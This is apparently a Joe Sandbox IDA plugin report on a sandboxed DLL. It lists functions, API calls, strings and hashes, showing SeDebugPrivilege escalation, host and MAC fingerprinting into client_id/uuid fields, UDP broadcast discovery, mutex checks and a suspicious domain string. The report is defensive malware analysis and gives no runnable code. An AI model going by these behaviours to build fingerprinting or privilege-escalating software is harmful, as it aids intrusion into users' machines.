Instruction Fuzzy Hash: A6717C70508741AFD724CF69C885A6EB7F5FF89310F508A2EF5A6C62A1D731E984CB12

Function 1001A6D8 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 173
synchronizationsleepCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 1001A6DD

Part of subcall function 1001136C: CoCreateGuid.OLE32(?), ref: 1001138D
Part of subcall function 1001136C: _fprintf.LIBCMT ref: 100113A5

Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273

_sprintf.LIBCMT ref: 1001A741

Part of subcall function 10001898: _sprintf.LIBCMT ref: 100018EE
Part of subcall function 10001898: _memmove.LIBCMT ref: 1000190C

Part of subcall function 100168F4: __EH_prolog.LIBCMT ref: 100168F9

OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7B4
GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7BC
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001A7DF
GetLastError.KERNEL32(?,?,?,?,?), ref: 1001A7E7
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A815
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A818
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 1001A83E
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?), ref: 1001A852
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A87C
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 1001A893
GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A89A
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8AD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8B5
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8BD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 1001A8C5

Strings

jkdi%42&!#, xrefs: 1001A746, 1001A74B, 1001A758
13a.dh7483y.com, xrefs: 1001A730
%s%s, xrefs: 1001A73B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorH_prologLast$Open_sprintf$ComputerGuidNameSleep_fprintf_memmove
String ID: %s%s$13a.dh7483y.com$jkdi%42&!#
API String ID: 1969416865-4094921056
Opcode ID: 77fc53505133d0cee0eb71986c5095c13c0397c5f280e46dd93d8412a04ec331
Instruction ID: a8d946be910b25d93d618c846ade29e6a59fa686ccbc9f3ba0165ef815e5f331
Opcode Fuzzy Hash: 77fc53505133d0cee0eb71986c5095c13c0397c5f280e46dd93d8412a04ec331
Instruction Fuzzy Hash: 7D518171D04268EFEB11DBA4CC95FEE7BB8EF04340F440029F505A7192DB74AA89CBA5

Function 1001C9A2 Relevance: 33.8, APIs: 11, Strings: 8, Instructions: 509
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(00005CE3), ref: 1001C9DE
inet_addr.WS2_32(255.255.255.255), ref: 1001C9EE
setsockopt.WS2_32 ref: 1001CA0D

Part of subcall function 100022F0: gethostname.WS2_32(?,00000100), ref: 1000230B

Sleep.KERNELBASE(0000000A), ref: 1001CAB7
sendto.WS2_32(?,?,?,00000000,?,?), ref: 1001CB24
recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001CE9D
WSAGetLastError.WS2_32(?,?,00000000,?,?,?,?,?,bck,00000000,?), ref: 1001CEAC
_memcmp.LIBCMT ref: 1001CF08
closesocket.WS2_32(?), ref: 1001D104

Strings

127.0.0.1, xrefs: 1001CF02
bckhst, xrefs: 1001CBB6, 1001CCE9, 1001CCFD
bck_w, xrefs: 1001CC3A, 1001CC4E
recvfrom compare is faild szIPAddr:%s.res:%d bWaitStart:%d, xrefs: 1001CFCC
serch recvfrom :%s., xrefs: 1001CB40
[%d]Find szIPAddr:%s.Host:%s is not same., xrefs: 1001CF45
bck, xrefs: 1001CA55, 1001CA5A, 1001CA62, 1001CCB7, 1001CCCB
255.255.255.255, xrefs: 1001C9E4

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLastSleep_memcmpclosesocketgethostnamehtonsinet_addrrecvfromsendtosetsockopt
String ID: 127.0.0.1$255.255.255.255$[%d]Find szIPAddr:%s.Host:%s is not same.$bck$bck_w$bckhst$recvfrom compare is faild szIPAddr:%s.res:%d bWaitStart:%d$serch recvfrom :%s.
API String ID: 2742795110-796237128
Opcode ID: 7371ef3f4562dd1ebe9a4f35494abf6c80efcf0c0e4d606efb9f3fa8ef3634a2
Instruction ID: 71a6e8450f25750b8eb19ae326af7dcd83f814d640ad7f3094fd8df69461fb78
Opcode Fuzzy Hash: 7371ef3f4562dd1ebe9a4f35494abf6c80efcf0c0e4d606efb9f3fa8ef3634a2
Instruction Fuzzy Hash: 5D12A335108385AEE331DB20C891FEBB7E9EF95344F50491EE5CA86092DB71E989CB53

Function 10011C4E Relevance: 33.8, APIs: 3, Strings: 16, Instructions: 500
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 10011C53

Part of subcall function 100021EB: GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209

_free.LIBCMT ref: 100121B7
_free.LIBCMT ref: 100121CC

Strings

err_cdn, xrefs: 1001204B, 10012058, 1001205D, 1001205E
is_down, xrefs: 10011FBA, 10011FC9, 10011FD0
sys_res, xrefs: 10011E90, 10011E9F, 10011EA0
1.0.0.64, xrefs: 10011EB0, 10011ECC, 10011ECD
client_id, xrefs: 10011D7C, 10011D8F, 10011D90
list, xrefs: 1001213D
mac, xrefs: 10011DF7, 10011E0A, 10011E0B
is_exe, xrefs: 10011FDE, 10011FED, 10011FF4
version, xrefs: 10012090, 1001209F, 100120A6
err_code, xrefs: 10012002, 10012011, 10012018
plug_id, xrefs: 10011F99, 10011FA6, 10011FAB, 10011FAC
c_post_id, xrefs: 10011E6F, 10011E82, 10011E83
d_plat, xrefs: 1001206C, 1001207B, 10012082
host, xrefs: 10011EDE, 10011EED, 10011EEE
err_info, xrefs: 100120DC, 100120E9, 100120EF, 100120F0
uuid, xrefs: 10011E33, 10011E46, 10011E47

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _free$AdaptersH_prologInfo
String ID: 1.0.0.64$c_post_id$client_id$d_plat$err_cdn$err_code$err_info$host$is_down$is_exe$list$mac$plug_id$sys_res$uuid$version
API String ID: 2722462171-1692044417
Opcode ID: 3b51da644e9a541e946d01bca52a5af4cba8a090a7a3e514908eb9f9f3a008e7
Instruction ID: f90d9264f1c1e6498c44510829453a28db1729ed47331b4b3d70f0524b460866
Opcode Fuzzy Hash: 3b51da644e9a541e946d01bca52a5af4cba8a090a7a3e514908eb9f9f3a008e7
Instruction Fuzzy Hash: 3B02D570910199AEEB19CB74CC45FEEBBB9EF46340F0441ACE406DB196DB70AE85CB60

Function 1001A9A0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 194
synchronizationsleepthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(---------------->is null!!!!!!!!!!!!!!!!), ref: 1001A9EB
CreateMutexA.KERNEL32(00000000,00000000,null1), ref: 1001A9FA
Sleep.KERNEL32(000001F4,00000069,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1001AB66
CreateThread.KERNELBASE(00000000,00000000,Function_0001A91C,00000000,00000000,?), ref: 1001AB89

Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D

ReleaseMutex.KERNEL32(00000000), ref: 1001ABD0
CloseHandle.KERNEL32 ref: 1001ABD8
ReleaseMutex.KERNEL32 ref: 1001ABE0
CloseHandle.KERNEL32 ref: 1001ABE8
Sleep.KERNEL32(000001F4), ref: 1001AC02
TerminateThread.KERNEL32(0000024C,00000000), ref: 1001AC13
CloseHandle.KERNEL32 ref: 1001AC1F

Part of subcall function 1001B976: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
Part of subcall function 1001B976: GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A

Part of subcall function 1000C15A: __vsnprintf_s.LIBCMT ref: 1000C194
Part of subcall function 1000C15A: _memmove.LIBCMT ref: 1000C1E9

Part of subcall function 1001C2A5: GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
Part of subcall function 1001C2A5: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
Part of subcall function 1001C2A5: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
Part of subcall function 1001C2A5: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
Part of subcall function 1001C2A5: CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F

Strings

->FILE_APP mutex is existing, xrefs: 1001AAB9, 1001AABE, 1001AAC6
CheckApp:%d text:%s, xrefs: 1001AB1A
null1, xrefs: 1001A9F1
Input param:%s, xrefs: 1001AA46
---------------->is null!!!!!!!!!!!!!!!!, xrefs: 1001A9E6
->FILE_APP today is runing, xrefs: 1001AB2B, 1001AB30, 1001AB38
get:%s, xrefs: 1001AA8F
555prc4xnupd, xrefs: 1001AA21, 1001AA45

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandle_malloc$CreateMutex$ProcessReleaseSleepThreadToken$AdjustCurrentDebugErrorFileLastLookupMappingOpenOutputPrivilegePrivilegesStringTerminateValue__vsnprintf_s_memmove
String ID: ->FILE_APP mutex is existing$ ->FILE_APP today is runing$---------------->is null!!!!!!!!!!!!!!!!$555prc4xnupd$CheckApp:%d text:%s$Input param:%s$get:%s$null1
API String ID: 3952390217-1909696795
Opcode ID: d30990bd2dcfa78e3e7c9b7b5930c09dcae62470eb650fd5a8a75b460fc45789
Instruction ID: b9528a95e4524d17b4f6d8a13efaef8769615a14464e7c918a77bf7d60e1a239
Opcode Fuzzy Hash: d30990bd2dcfa78e3e7c9b7b5930c09dcae62470eb650fd5a8a75b460fc45789
Instruction Fuzzy Hash: 3B61F475504350AFE710EF25CC89EAF7BE9EF85350F00052EF545961A2DB70EA84CBA2

Function 1001570F Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 176
synchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 10015714

Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 100157C1
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015839
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 10015843
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 1001586A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1001586E
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 10015899
CreateMutexA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 100158AE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158B5
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158CA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158D8
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 100158E8

Strings

2#b.dg7983%1io, xrefs: 100157AE, 100157B4
m, xrefs: 1001574B
%s%s%saz$%^$%@#sa$EEFsd2, xrefs: 100157BB
gnbc344asd, xrefs: 100157D4, 100157D9, 100157E1

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
String ID: %s%s%saz$%^$%@#sa$EEFsd2$2#b.dg7983%1io$gnbc344asd$m
API String ID: 2639461599-1078873301
Opcode ID: 07fedbff580469d4b17fa7fa6d80ea615dcd76a19c10074564fc3731cc07f228
Instruction ID: db7850e3fd9d69c0528ec08768e9ac04465b1e639cfc869010542aedb86768d4
Opcode Fuzzy Hash: 07fedbff580469d4b17fa7fa6d80ea615dcd76a19c10074564fc3731cc07f228
Instruction Fuzzy Hash: F0615FB1D00228EFEB11DFA4CC91ADEB7BDFF18250F54406AE506A7152DB70AA84CF65

Function 1001D388 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 270
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6

socket.WS2_32(00000002,00000002,00000011), ref: 1001D429
WSAGetLastError.WS2_32 ref: 1001D43A
htons.WS2_32(?), ref: 1001D457
setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 1001D47C
setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 1001D49C
setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 1001D4B4
sendto.WS2_32(00000000,?,?,00000000,000000FF,00000010), ref: 1001D4DC
recvfrom.WS2_32(00000000,?,00000400,00000000,?,?), ref: 1001D545
inet_ntoa.WS2_32(?), ref: 1001D558
Sleep.KERNEL32(0000000A), ref: 1001D65A
closesocket.WS2_32(00000000), ref: 1001D693
Sleep.KERNELBASE(000003E8), ref: 1001D69E

Strings

req, xrefs: 1001D3CC, 1001D3D1, 1001D3D9
res, xrefs: 1001D3F0, 1001D3F5, 1001D404

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: setsockopt$Sleep$ErrorLast_memmoveclosesockethtonsinet_ntoarecvfromsendtosocket
String ID: req$res
API String ID: 3206013018-3551752921
Opcode ID: 59a785be824b679cbb15ac01aa723ad3dce333656ced3cecef62665f76dcea99
Instruction ID: f0e5c5a51288f6555a9495399a3376c632556063d47a78e4a63fd70f32be9dbf
Opcode Fuzzy Hash: 59a785be824b679cbb15ac01aa723ad3dce333656ced3cecef62665f76dcea99
Instruction Fuzzy Hash: 9B91D472108781AFE310EF24CC85BAABBE9EF49354F00461AF585CB1D1DB71E989CB52

Function 1000DD2B Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 377
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 1000DD30

Part of subcall function 10033C98: __fsopen.LIBCMT ref: 10033CA3

__fread_nolock.LIBCMT ref: 1000DDAB
_memmove.LIBCMT ref: 1000DE27
__localtime64.LIBCMT ref: 1000DEBE
__time64.LIBCMT ref: 1000DEE7
__localtime64.LIBCMT ref: 1000DEFF

Part of subcall function 100344AB: __gmtime64_s.LIBCMT ref: 100344BE

_sprintf.LIBCMT ref: 1000DF50

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

GetLastError.KERNEL32(?,?,?,10006588,?,00000000), ref: 1000E029
__time64.LIBCMT ref: 1000E0D5
_sprintf.LIBCMT ref: 1000E113

Strings

File time update faild,can't create file., xrefs: 1000E153, 1000E158, 1000E163
O:%d-%d-%d %02d:%02d:%02d N:%d-%d-%d %02d:%02d:%02d ID:%s, xrefs: 1000DF4A
time file is null, xrefs: 1000E005, 1000E00A, 1000E015
%d-%s-%s, xrefs: 1000E10D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog__localtime64__time64_sprintf$ErrorLast__fread_nolock__fsopen__gmtime64_s_memmove
String ID: %d-%s-%s$File time update faild,can't create file.$O:%d-%d-%d %02d:%02d:%02d N:%d-%d-%d %02d:%02d:%02d ID:%s$time file is null
API String ID: 1195966642-4095322339
Opcode ID: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
Instruction ID: 3c64a6cba0836d90df9f4256677c0f3f46e6d179118a5539ab0e8369d48d467e
Opcode Fuzzy Hash: e1fb886c5aeb8dbae39b044ecd0a81fa01c9e8e7afcd57a19af7fa8add68997b
Instruction Fuzzy Hash: D6D1B675D04249EFEB15DFA4CC91EEEB7B9EF05340F1040AAE509AB191DB31AE49CB60

Function 1001E1A7 Relevance: 24.1, APIs: 16, Instructions: 76
sleepthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(?), ref: 1001E1BD
closesocket.WS2_32(?), ref: 1001E1C8
closesocket.WS2_32(?), ref: 1001E1D4
Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
Sleep.KERNELBASE ref: 1001E26F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Sleep$CloseHandleTerminateThread$closesocket
String ID:
API String ID: 3830272782-0
Opcode ID: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
Instruction ID: bc42b57c38fdf492546c018e19de88c484626926c77996ddfbf50983c1e4f3a2
Opcode Fuzzy Hash: 17bd002c58accd4946d52a30de27bc7000296f87d6f1dab3d335eb3c6ed9b892
Instruction Fuzzy Hash: 5121B830500B95AFD761AF36CC88B1ABBE5FF48749F11482DE186969A0D7B1E890CF14

Function 1000246E Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 362
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 10002473

Part of subcall function 1001A146: _malloc.LIBCMT ref: 1001A17E

Part of subcall function 1001A61C: _wprintf.LIBCMT ref: 1001A640

Part of subcall function 1001A65F: _wprintf.LIBCMT ref: 1001A683

Part of subcall function 10033AFD: __wcstoi64.LIBCMT ref: 10033B10

WSAGetLastError.WS2_32(?,?,?,00000000,000000FF,00000000,?,?,?,?,00000001), ref: 100028E2

Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6

Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99

Part of subcall function 10003078: __EH_prolog.LIBCMT ref: 1000307D

Part of subcall function 10017A82: __EH_prolog.LIBCMT ref: 10017A87
Part of subcall function 10017A82: _wprintf.LIBCMT ref: 10017AB4

Part of subcall function 10017C93: _wprintf.LIBCMT ref: 10017CB7

Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017CF2
Part of subcall function 10017CD2: _wprintf.LIBCMT ref: 10017D17

Part of subcall function 10017BF7: _wprintf.LIBCMT ref: 10017C1D

_swscanf.LIBCMT ref: 100027EB

Strings

application/x-www-form-urlencoded, xrefs: 100026B4
Content-type, xrefs: 100026C3
GET, xrefs: 10002575, 10002585
HTTP readBody data:%s, xrefs: 10002784
HTTP/1.1, xrefs: 10002609, 10002615
http://, xrefs: 10002595, 100025A1
text/plain, xrefs: 100026E8
Accept, xrefs: 100026F7
%d bytes received %s , xrefs: 10002929
Host, xrefs: 10002683

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wprintf$H_prolog$_memmove$ErrorLast__wcstoi64_malloc_swscanf
String ID: HTTP/1.1$ http://$%d bytes received %s $Accept$Content-type$GET$HTTP readBody data:%s$Host$application/x-www-form-urlencoded$text/plain
API String ID: 1397112314-3476068429
Opcode ID: 91028218de2b38da57e7cfe5cfe5cb8ebddedd6c49fd7cebcaafd1303919e32e
Instruction ID: a7634ae425d1516add6669ffa0e6d985a436ae34248816d06a7b430fa3304256
Opcode Fuzzy Hash: 91028218de2b38da57e7cfe5cfe5cb8ebddedd6c49fd7cebcaafd1303919e32e
Instruction Fuzzy Hash: B1E1D235800258EEEB15DBA4CC96FEDB7B8EF11350F50409AE50A77186DF706B88CB62

Function 1000E186 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 213
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 1000E18B
